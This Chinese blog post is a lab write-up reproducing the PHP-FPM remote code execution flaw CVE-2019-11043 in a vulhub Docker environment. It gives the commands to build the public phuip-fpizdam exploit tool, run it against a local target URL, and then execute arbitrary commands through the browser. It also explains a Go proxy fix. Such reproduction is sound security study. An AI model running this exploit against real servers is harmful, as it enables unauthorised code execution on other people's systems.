PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现

1|0PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现


1|1环境搭建


git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043 docker-compose up -d

访问

1|2安装漏洞利用工具


git clone https://github.com/neex/phuip-fpizdam.git cd phuip-fpizdam go env -w GOPROXY=https://goproxy.cn go get -v && go build

1|3攻击


go run . "http://192.168.125.1:8080/index.php"

显示漏洞利用成功

浏览器进行访问,成功复现,id可替换为其他命令

1|4报错及解决方法


报错原因:默认使用proxy.golang.org,国内无法访问

解决方法:更换为国内代理

执行命令

go env -w GOPROXY=https://goproxy.cn

__EOF__

本文作者LRainner
本文链接https://www.cnblogs.com/LRainner/p/15961906.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   LRainner  阅读(161)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示